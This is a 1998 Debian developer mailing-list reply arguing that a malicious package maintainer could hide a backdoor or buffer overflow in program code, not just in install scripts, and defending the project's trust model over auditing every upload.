Re: Trust in the Debian Build Process

To: debian-devel@lists.debian.org
Subject: Re: Trust in the Debian Build Process
From: "Stephen J. Carpenter" <sjc@delphi.com>
Date: Mon, 30 Nov 1998 09:11:26 -0500
Message-id: <[🔎] 19981130091126.D18349@lenny.mgh.harvard.edu>
Mail-followup-to: debian-devel@lists.debian.org
In-reply-to: <[🔎] Pine.LNX.3.96.981130071347.31006A-100000@helium>; from Robert Edmonds on Mon, Nov 30, 1998 at 07:17:52AM -0500
References: <[🔎] 19981130084914.B4215@baum.com.au> <[🔎] Pine.LNX.3.96.981130071347.31006A-100000@helium>

On Mon, Nov 30, 1998 at 07:17:52AM -0500, Robert Edmonds wrote:
> On Mon, 30 Nov 1998, Jiri Baum wrote:
> 
> > > 	Umm, I never build any packages as root. fakeroot rules.
> > 
> > Yes, but you get root access to anyone who installs your packages, via the
> > install scripts.
> > 
> > Jiri <jiri@baum.com.au>
> 
> 
> *Only* packages with pre/post inst/rm scripts are affected by this. For
> the most part debhelper tends to generate the scripts, but since you've
> got me worried I'm going to go grep /var/lib/dpkg/info for nasties  ;-)

That is simple bullshit.

As not to single anyone out...ill use my package xfstt as an example
(which you are free to check if my orig.tgz is the same as the original 
authors and review my diff for it)

How hard would it be for me to introduce a small "bug" into it which would go
unnoticed?

Why does it HAVE to be the pre/post inst/rm ?

That is too easy to spot...it would be much easier for some malicious person
to add an "undocumented feature" or even a buffer overflow into the program
and then could exploit it at will against any machine using it.

Sure... MANY packages have programs which are never run as root (or should
never be)..simple user utilities, but then those tools still run as
users on systems, so they then have access to any acount which uses such 
a tool.

The "problem" here is that maintainers are "trusted" to be faithfull 
and benign. The only other way would be to have every upload verified and
security audited before being accepted.

While that would greatly increase the security of our system (even
in the absence of malicous maintainers), it would introduce an unacceptable
(IMHO) bottleneck in the process. This is one bottleneck which would 
fill FAST.

We have a nice system of trust, and I think it works. Any system will
have its flaws. Really though...there has to be some trust.

Afterall, there is no more trust placed in a maintainer that what they
upload contains no malicous features, than in the upstream author not to
introduce malicous features int he next revision...or in the CD ROM vendor
(for those who buy CDROMs) not to build a few compromised binaries.

-Steve
-- 
/* -- Stephen Carpenter <sjc@delphi.com> --- <sjc@debian.org>------------ */
"You can't legislate intelligence and common sense into people"
                -- Will Rogers

Reply to:

References:
- Re: Trust in the Debian Build Process
  - From: Jiri Baum <jiri@baum.com.au>
- Re: Trust in the Debian Build Process
  - From: Robert Edmonds <stu@novare.net>

Prev by Date: Re: __register_frame_info: A complete scan
Next by Date: Re: Intent of package LDP
Previous by thread: Re: Trust in the Debian Build Process
Next by thread: Re: Trust in the Debian Build Process
Index(es):
- Date
- Thread